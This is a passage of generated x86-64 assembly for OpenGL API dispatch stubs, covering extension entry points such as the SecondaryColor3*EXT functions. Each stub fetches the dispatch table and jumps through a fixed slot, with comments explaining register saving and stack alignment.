	call	_x86_64_get_dispatch@PLT
	movq	4584(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4584(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4584(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4584(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(NormalPointerEXT), .-GL_PREFIX(NormalPointerEXT)

	/* TexCoordPointerEXT -- dispatch slot 574 (offset 4592); 5 integer/pointer args. */
	.p2align	4,,15
	.globl	GL_PREFIX(TexCoordPointerEXT)
	.type	GL_PREFIX(TexCoordPointerEXT), @function
GL_PREFIX(TexCoordPointerEXT):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4592(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	call	_x86_64_get_dispatch@PLT
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4592(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4592(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	call	_glapi_get_dispatch
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4592(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(TexCoordPointerEXT), .-GL_PREFIX(TexCoordPointerEXT)

	/* VertexPointerEXT -- dispatch slot 575 (offset 4600); 5 integer/pointer args. */
	.p2align	4,,15
	.globl	GL_PREFIX(VertexPointerEXT)
	.type	GL_PREFIX(VertexPointerEXT), @function
GL_PREFIX(VertexPointerEXT):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4600(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	call	_x86_64_get_dispatch@PLT
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4600(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4600(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	call	_glapi_get_dispatch
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4600(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexPointerEXT), .-GL_PREFIX(VertexPointerEXT)
	/*
	 * Generated GL dispatch stubs (x86-64, SysV ABI): load the per-thread
	 * dispatch table into %rax, fetch the 8-byte function pointer at the
	 * entry's fixed slot (offset = slot * 8), tail-jump.  Live argument
	 * registers are saved around the table-lookup call where needed.
	 */
	/* PointParameterfEXT -- dispatch slot 576 (offset 4608); 1 integer arg + 1
	 * float arg spilled to a 24-byte scratch area (24+8(ret) keeps alignment). */
	.p2align	4,,15
	.globl	GL_PREFIX(PointParameterfEXT)
	.type	GL_PREFIX(PointParameterfEXT), @function
GL_PREFIX(PointParameterfEXT):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4608(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$24, %rsp
	movq	%rdi, (%rsp)
	movq	%xmm0, 8(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	8(%rsp), %xmm0
	movq	(%rsp), %rdi
	addq	$24, %rsp
	movq	4608(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4608(%rax), %r11
	jmp	*%r11
1:
	subq	$24, %rsp
	movq	%rdi, (%rsp)
	movq	%xmm0, 8(%rsp)
	call	_glapi_get_dispatch
	movq	8(%rsp), %xmm0
	movq	(%rsp), %rdi
	addq	$24, %rsp
	movq	4608(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(PointParameterfEXT), .-GL_PREFIX(PointParameterfEXT)

	/* PointParameterfvEXT -- dispatch slot 577 (offset 4616); 2 args + %rbp pad. */
	.p2align	4,,15
	.globl	GL_PREFIX(PointParameterfvEXT)
	.type	GL_PREFIX(PointParameterfvEXT), @function
GL_PREFIX(PointParameterfvEXT):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4616(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	4616(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4616(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	4616(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(PointParameterfvEXT), .-GL_PREFIX(PointParameterfvEXT)

	/* LockArraysEXT -- dispatch slot 578 (offset 4624); 2 args + %rbp pad. */
	.p2align	4,,15
	.globl	GL_PREFIX(LockArraysEXT)
	.type	GL_PREFIX(LockArraysEXT), @function
GL_PREFIX(LockArraysEXT):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4624(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	4624(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4624(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	4624(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(LockArraysEXT), .-GL_PREFIX(LockArraysEXT)

	/* UnlockArraysEXT -- dispatch slot 579 (offset 4632); no arguments, so the
	 * single %rbp push exists only to keep %rsp 16-byte aligned at the call. */
	.p2align	4,,15
	.globl	GL_PREFIX(UnlockArraysEXT)
	.type	GL_PREFIX(UnlockArraysEXT), @function
GL_PREFIX(UnlockArraysEXT):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4632(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	movq	4632(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4632(%rax), %r11
	jmp	*%r11
1:
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	movq	4632(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(UnlockArraysEXT), .-GL_PREFIX(UnlockArraysEXT)
	/*
	 * Anonymous dispatch stubs (x86-64, SysV ABI), exported by table index
	 * only and marked HIDDEN: slot offset = N * 8.  Same mechanics as the
	 * named stubs: fetch the per-thread dispatch table into %rax, load
	 * the slot's function pointer, tail-jump; live argument registers are
	 * saved around the lookup call.
	 */
	/* _dispatch_stub_580 -- slot 580 (offset 4640); 2 args + %rbp alignment pad. */
	.p2align	4,,15
	.globl	GL_PREFIX(_dispatch_stub_580)
	.type	GL_PREFIX(_dispatch_stub_580), @function
	HIDDEN(GL_PREFIX(_dispatch_stub_580))
GL_PREFIX(_dispatch_stub_580):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4640(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	4640(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4640(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	4640(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(_dispatch_stub_580), .-GL_PREFIX(_dispatch_stub_580)

	/* _dispatch_stub_581 -- slot 581 (offset 4648); 2 args + %rbp alignment pad. */
	.p2align	4,,15
	.globl	GL_PREFIX(_dispatch_stub_581)
	.type	GL_PREFIX(_dispatch_stub_581), @function
	HIDDEN(GL_PREFIX(_dispatch_stub_581))
GL_PREFIX(_dispatch_stub_581):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4648(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	4648(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4648(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	4648(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(_dispatch_stub_581), .-GL_PREFIX(_dispatch_stub_581)
.p2align 4,,15
.globl GL_PREFIX(SecondaryColor3bEXT)
.type GL_PREFIX(SecondaryColor3bEXT), @function
GL_PREFIX(SecondaryColor3bEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4656(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4656(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4656(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 4656(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(SecondaryColor3bEXT), .-GL_PREFIX(SecondaryColor3bEXT)
.p2align 4,,15
.globl GL_PREFIX(SecondaryColor3bvEXT)
.type GL_PREFIX(SecondaryColor3bvEXT), @function
GL_PREFIX(SecondaryColor3bvEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4664(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 4664(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4664(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 4664(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(SecondaryColor3bvEXT), .-GL_PREFIX(SecondaryColor3bvEXT)
.p2align 4,,15
.globl GL_PREFIX(SecondaryColor3dEXT)
.type GL_PREFIX(SecondaryColor3dEXT), @function
GL_PREFIX(SecondaryColor3dEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4672(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 4672(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4672(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 4672(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(SecondaryColor3dEXT), .-GL_PREFIX(SecondaryColor3dEXT)
.p2align 4,,15
.globl GL_PREFIX(SecondaryColor3dvEXT)
.type GL_PREFIX(SecondaryColor3dvEXT), @function
GL_PREFIX(SecondaryColor3dvEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4680(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 4680(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4680(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 4680(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(SecondaryColor3dvEXT), .-GL_PREFIX(SecondaryColor3dvEXT)
.p2align 4,,15
.globl GL_PREFIX(SecondaryColor3fEXT)
.type GL_PREFIX(SecondaryColor3fEXT), @function
GL_PREFIX(SecondaryColor3fEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4688(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 4688(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4688(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 4688(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(SecondaryColor3fEXT), .-GL_PREFIX(SecondaryColor3fEXT)
.p2align 4,,15
.globl GL_PREFIX(SecondaryColor3fvEXT)
.type GL_PREFIX(SecondaryColor3fvEXT), @function
GL_PREFIX(SecondaryColor3fvEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4696(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 4696(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4696(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 4696(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(SecondaryColor3fvEXT), .-GL_PREFIX(SecondaryColor3fvEXT)
.p2align 4,,15
.globl GL_PREFIX(SecondaryColor3iEXT)
.type GL_PREFIX(SecondaryColor3iEXT), @function
GL_PREFIX(SecondaryColor3iEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4704(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4704(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4704(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 4704(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(SecondaryColor3iEXT), .-GL_PREFIX(SecondaryColor3iEXT)
.p2align 4,,15
.globl GL_PREFIX(SecondaryColor3ivEXT)
.type GL_PREFIX(SecondaryColor3ivEXT), @function
GL_PREFIX(SecondaryColor3ivEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4712(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 4712(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4712(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 4712(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(SecondaryColor3ivEXT), .-GL_PREFIX(SecondaryColor3ivEXT)
	/* -----------------------------------------------------------------
	 * GL API dispatch stubs (auto-generated).  Each stub loads the
	 * current dispatch table pointer into %rax, loads the function
	 * pointer from this entry point's fixed slot offset, and tail-jumps
	 * through %r11 (caller-clobbered, so safe to use without saving).
	 * Three build variants per stub:
	 *   GLX_USE_TLS — dispatch table comes from TLS via
	 *     _x86_64_get_dispatch, which preserves the argument registers,
	 *     so nothing is saved.
	 *   PTHREADS    — _x86_64_get_dispatch is an ordinary call that may
	 *     clobber argument registers, so the live GPR args are pushed
	 *     around it.  Where a %rbp push appears it carries no argument:
	 *     it only pads the push count to an odd number so %rsp is
	 *     16-byte aligned at the call (SysV AMD64: %rsp % 16 == 8 on
	 *     function entry).
	 *   default     — read _glapi_Dispatch directly; only if it is NULL
	 *     fall back to calling _glapi_get_dispatch (same reg saving).
	 * ----------------------------------------------------------------- */
	/* glSecondaryColor3sEXT: slot 4720; 3 GPR args (%rdi,%rsi,%rdx) */
	.p2align	4,,15
	.globl GL_PREFIX(SecondaryColor3sEXT)
	.type GL_PREFIX(SecondaryColor3sEXT), @function
GL_PREFIX(SecondaryColor3sEXT):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4720(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4720(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4720(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4720(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(SecondaryColor3sEXT), .-GL_PREFIX(SecondaryColor3sEXT)

	/* glSecondaryColor3svEXT: slot 4728; 1 GPR arg (%rdi) */
	.p2align	4,,15
	.globl GL_PREFIX(SecondaryColor3svEXT)
	.type GL_PREFIX(SecondaryColor3svEXT), @function
GL_PREFIX(SecondaryColor3svEXT):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4728(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	4728(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4728(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	4728(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(SecondaryColor3svEXT), .-GL_PREFIX(SecondaryColor3svEXT)

	/* glSecondaryColor3ubEXT: slot 4736; 3 GPR args (%rdi,%rsi,%rdx) */
	.p2align	4,,15
	.globl GL_PREFIX(SecondaryColor3ubEXT)
	.type GL_PREFIX(SecondaryColor3ubEXT), @function
GL_PREFIX(SecondaryColor3ubEXT):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4736(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4736(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4736(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4736(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(SecondaryColor3ubEXT), .-GL_PREFIX(SecondaryColor3ubEXT)

	/* glSecondaryColor3ubvEXT: slot 4744; 1 GPR arg (%rdi) */
	.p2align	4,,15
	.globl GL_PREFIX(SecondaryColor3ubvEXT)
	.type GL_PREFIX(SecondaryColor3ubvEXT), @function
GL_PREFIX(SecondaryColor3ubvEXT):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4744(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	4744(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4744(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	4744(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(SecondaryColor3ubvEXT), .-GL_PREFIX(SecondaryColor3ubvEXT)

	/* glSecondaryColor3uiEXT: slot 4752; 3 GPR args (%rdi,%rsi,%rdx) */
	.p2align	4,,15
	.globl GL_PREFIX(SecondaryColor3uiEXT)
	.type GL_PREFIX(SecondaryColor3uiEXT), @function
GL_PREFIX(SecondaryColor3uiEXT):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4752(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4752(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4752(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4752(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(SecondaryColor3uiEXT), .-GL_PREFIX(SecondaryColor3uiEXT)

	/* glSecondaryColor3uivEXT: slot 4760; 1 GPR arg (%rdi) */
	.p2align	4,,15
	.globl GL_PREFIX(SecondaryColor3uivEXT)
	.type GL_PREFIX(SecondaryColor3uivEXT), @function
GL_PREFIX(SecondaryColor3uivEXT):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4760(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	4760(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4760(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	4760(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(SecondaryColor3uivEXT), .-GL_PREFIX(SecondaryColor3uivEXT)

	/* glSecondaryColor3usEXT: slot 4768; 3 GPR args (%rdi,%rsi,%rdx) */
	.p2align	4,,15
	.globl GL_PREFIX(SecondaryColor3usEXT)
	.type GL_PREFIX(SecondaryColor3usEXT), @function
GL_PREFIX(SecondaryColor3usEXT):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4768(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4768(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4768(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4768(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(SecondaryColor3usEXT), .-GL_PREFIX(SecondaryColor3usEXT)

	/* glSecondaryColor3usvEXT: slot 4776; 1 GPR arg (%rdi) */
	.p2align	4,,15
	.globl GL_PREFIX(SecondaryColor3usvEXT)
	.type GL_PREFIX(SecondaryColor3usvEXT), @function
GL_PREFIX(SecondaryColor3usvEXT):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4776(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	4776(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4776(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	4776(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(SecondaryColor3usvEXT), .-GL_PREFIX(SecondaryColor3usvEXT)
	/* Dispatch stubs (generated): load dispatch table into %rax, then
	 * tail-jump through the slot via caller-clobbered %r11.  Under
	 * PTHREADS the live argument registers are saved around the lookup
	 * call; a %rbp push (where present) is alignment padding only — it
	 * makes the push count odd so %rsp stays 16-byte aligned at the
	 * call (SysV AMD64 enters with %rsp % 16 == 8). */
	/* glSecondaryColorPointerEXT: slot 4784; 4 GPR args + %rbp pad */
	.p2align	4,,15
	.globl GL_PREFIX(SecondaryColorPointerEXT)
	.type GL_PREFIX(SecondaryColorPointerEXT), @function
GL_PREFIX(SecondaryColorPointerEXT):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4784(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4784(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4784(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4784(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(SecondaryColorPointerEXT), .-GL_PREFIX(SecondaryColorPointerEXT)

	/* glMultiDrawArraysEXT: slot 4792; 4 GPR args + %rbp pad */
	.p2align	4,,15
	.globl GL_PREFIX(MultiDrawArraysEXT)
	.type GL_PREFIX(MultiDrawArraysEXT), @function
GL_PREFIX(MultiDrawArraysEXT):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4792(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4792(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4792(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4792(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
